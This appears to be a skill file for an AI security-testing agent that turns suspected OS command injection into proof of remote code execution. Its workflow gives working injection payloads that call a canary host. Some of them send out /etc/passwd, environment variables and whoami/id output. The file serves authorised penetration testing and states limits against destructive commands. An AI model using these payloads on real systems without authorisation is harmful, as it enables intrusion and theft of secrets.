name: command-injection-rce
description: Turn suspected OS command injection (a parameter that lands in a shell or a child process) into proof of remote code execution via an OAST callback, plus one safe demonstration of follow-on impact (read a file, list users, env dump). Use when a parameter feeds an exec/spawn/system call, when payloads with $(), `, ;, |, && cause response differences, or when audit flags CWE-78 / CWE-77. Never sends destructive commands.
license: MIT
allowed-tools:
- query_records
- inspect_record
- replay_request
- oast_mint
- oast_poll
- attack_kit
- report_finding
- update_finding
- remember
- update_plan
Command Injection → RCE Proof
You have a parameter that smells like it lands in a shell or process
exec call. Your job is to prove arbitrary command execution by getting
an OAST callback from the server, then demonstrate one minimal
follow-on action (a file read, an env dump). Reporting "the response
changed when I sent ;" is not enough.
When this skill applies
- A parameter feeds something likely to exec:
cmd=,host=(ping),target=(traceroute),file=(image conversion, PDF render, zip/tar),filter=,format=(ffmpeg, imagemagick),name=on a user-management endpoint that shells out. - Response differs when you send characters that have shell meaning:
;,|,&,&&,||,`,$(...),\n. - A 500 error message reveals a binary name (
sh,bash,convert,ffmpeg,ImageMagick,node,python,php) in the stack trace or response body. - Audit finding: CWE-78 (OS command injection), CWE-77 (command injection), CWE-94 (code injection).
Workflow
1. Confirm a shell metacharacter changes behavior
Pick a candidate parameter from query_records + inspect_record.
Send three replay_request probes:
- Baseline: harmless value (e.g.
8.8.8.8for a ping endpoint). 8.8.8.8;→ trailing separator. Status / length differential?8.8.8.8 && echo hi→ doeshiappear in the response, or does the response take longer?
If none of these change the response, the parameter is probably sanitized or doesn't shell out. Stop and pick another candidate.
remember the candidate parameter and which metacharacter triggered
the differential (key: cmdinj-target).
2. Confirm execution via OAST
Mint a canary with oast_mint (kind: cmdinj-probe). Inject a payload
that performs a DNS or HTTP request to the canary. Choose the encoding
by the suspected OS / language:
- Generic shell:
value; curl <canary>orvalue && nslookup <canary> - Backticks:
value``curl`` (works insh/bash`). $()substitution:value$(curl <canary>).- Windows cmd.exe:
value & nslookup <canary>(note the single&). - PowerShell:
value; Invoke-WebRequest <canary>.
Use attack_kit with class: "cmd-injection" to pull canonical
payload patterns for the parameter's encoding (URL vs JSON vs header).
Poll oast_poll for 60 seconds. The first DNS or HTTP callback proves
execution. DNS-only is still proof (most internal hosts can resolve
external names even when HTTP egress is blocked).
remember the callback proof (timestamp, payload, callback URL) with
key cmdinj-proof.
3. One follow-on demonstration
Once RCE is proven, send ONE additional payload to size impact. Pick the cheapest demo that establishes "the attacker has hands on the box":
- File read:
; curl <canary>?d=$(cat /etc/passwd | base64)(base64 to survive DNS encoding; expect truncation). - Env dump:
; env | curl --data-binary @- <canary> - Hostname / user:
; (whoami; hostname; id) | curl --data-binary @- <canary>
Wait for the callback. Decode the leaked data (base64 if you used it).
Include ONE line of the leaked data in the finding — not the whole
/etc/passwd.
Do not run destructive commands: no rm, no > /etc/..., no
package installs, no port scans, no reverse shells, no persistent
mechanisms. The callback + one small data fetch is sufficient proof.
4. Persist the finding
report_finding:
severity:critical— OS command execution on the server is always critical regardless of what you leaked.title: name the endpoint, parameter, and the proof:"OS command injection in /api/render filter parameter; OAST callback + reads /etc/passwd".cwe_id: CWE-78.description: 3-4 sentences. The endpoint, the trigger metacharacter, the OAST callback timestamp, and one masked line of the follow-on demo (e.g.,"first /etc/passwd line: root:x:0:0:...").- Include the exact payload that triggered the callback.
Pitfalls
- A response delay when you send
; sleep 5is suggestive but not proof — networking jitter and shared rate limiters cause similar delays. Require an OAST callback before claiming RCE. - Some sandboxes (gVisor, nsjail) restrict egress; DNS-only callbacks may be all you get. Note that explicitly in the finding.
- Image processors (
convert,ffmpeg) sometimes have shell injection via filenames or annotation fields — these surfaces are less obvious thancmd=; check filenames. - Argument-injection (without shell) is a related but distinct flaw —
--config=/etc/passwdagainst a tool that reads--configfiles. Still report as CWE-77 / CWE-78 if it leaks data. - If the callback URL is base64-encoded data, decode and read it before reporting — sometimes the payload encoding garbled the data in transit and what you have is just truncated noise, not proof.
Output expectations
- One
report_finding(critical) with payload + callback timestamp + one masked line of leaked data. - A
remembernote (key:cmdinj-proof) with the canonical payload. - Plan item marked
done.